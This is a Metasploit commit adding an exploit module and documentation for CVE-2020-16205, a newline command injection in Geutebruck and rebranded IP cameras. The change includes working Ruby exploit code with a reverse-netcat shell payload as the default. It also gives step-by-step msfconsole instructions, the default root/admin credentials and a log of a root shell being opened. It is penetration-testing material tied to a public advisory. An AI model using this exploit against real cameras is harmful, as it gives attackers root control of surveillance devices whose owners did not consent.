Land #13986, Add CVE-2020-16205 exploit for Geutebruck G-CAM

rapid7 · Aug 17, 2020 · 27ae6c4 · 27ae6c4
2 parents d222d4b + 8f80d9b
commit 27ae6c4
Show file tree

Hide file tree

Showing 2 changed files with 191 additions and 0 deletions.
diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
@@ -0,0 +1,90 @@
+## Vulnerable Application
+
+The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25,
+firmware version 1.12.13.2 or firmware version 1.12.14.5:
+* Encoder and E2 Series Camera models:
+  * G-Code:
+    * EEC-2xxx
+  * G-Cam:
+    * EBC-21xx
+    * EFD-22xx
+    * ETHC-22xx
+    * EWPC-22xx
+
+Many brands use the same firmware:
+  * UDP Technology (which is also the supplier of the firmware for the other vendors)
+  * Ganz
+  * Visualint
+  * Cap
+  * THRIVE Intelligence
+  * Sophus
+  * VCA
+  * TripCorps
+  * Sprinx Technologies
+  * Smartec
+  * Riva
+
+This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.
+
+### Description
+
+This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the
+`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`.
+This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to
+inject a new line character, followed by the command they wish to execute, at which point the server will
+then interpret the new string as a separate command to be executed. Successful exploitation will result in
+remote code execution as the `root` user.
+
+Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03.
+
+## Verification Steps
+
+  1. Start the camera using default configuration
+  2. Launch msfconsole
+  3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
+  4. Do: `set httpusername <camera_username>`
+  5. Do: `set httppassword <camera_password>`
+  6. Do: `set lhost <metasploit_ip>`
+  5. Do: `set rhosts <camera_ip>`
+  6. Do: `set payload cmd/unix/reverse_netcat_gaping`
+  7. Do: `check` to be sure the target is vulnerable
+  8. Do: `exploit`
+  9. You should get a shell
+
+## Options
+
+The default credentials to log on the web interface are root/admin.
+
+ ### HTTPUSERNAME
+ A username used to authenticate on the admin page. **Default: root**
+
+ ### HTTPPASSWORD
+The password of the username used to authenticate on the admin page. **Default: admin**
+
+## Scenarios
+### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.
+```
+msf5 > use exploit/linux/http/geutebruck_testaction_exec
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
+payload => cmd/unix/reverse_netcat_gaping
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
+httpusername => root
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin
+httppassword => admin
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1
+lhost => 192.168.14.1
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58
+rhosts => 192.168.14.58
+msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.14.1:4444
+[*] 192.168.14.58:80 - Attempting to exploit...
+[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200
+pwd
+
+/tmp/www_ramdisk/uapi-cgi/admin
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux
+```
diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
+        'Description' => %q{
+          This module exploits an authenticated arbitrary command execution vulnerability within the 'server'
+          GET parameter of the /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
+          ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware
+          versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'.
+          Successful exploitation results in remote code execution as the root user.
+        },
+
+        'Author' =>
+          [
+            'Davy Douhine' # ddouhine
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            [ 'CVE', '2020-16205' ],
+            [ 'URL', 'http://geutebruck.com' ],
+            [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ],
+            [ 'URL', 'https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/' ]
+          ],
+        'DisclosureDate' => 'May 20 2020',
+        'Privileged' => true,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_ARMLE],
+        'Targets' => [
+          [ 'Automatic Target', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' =>
+         {
+           'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+         }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
+        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
+        OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
+      ]
+    )
+  end
+
+  def firmware
+    begin
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => '/brand.xml'
+      )
+      unless res
+        vprint_error 'Connection failed'
+        return CheckCode::Unknown
+      end
+
+      res_xml = res.get_xml_document
+      @version = res_xml.at('//firmware').text
+      return true
+    end
+  end
+
+  def check
+    result = firmware
+    return result unless result == true
+
+    version = Gem::Version.new(@version)
+    vprint_status "Found Geutebruck version #{version}"
+    if version < Gem::Version.new('1.12.0.25') || version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5')
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{rhost}:#{rport} - Attempting to exploit...")
+    send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => target_uri.path,
+        'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" }
+      }
+    )
+  end
+end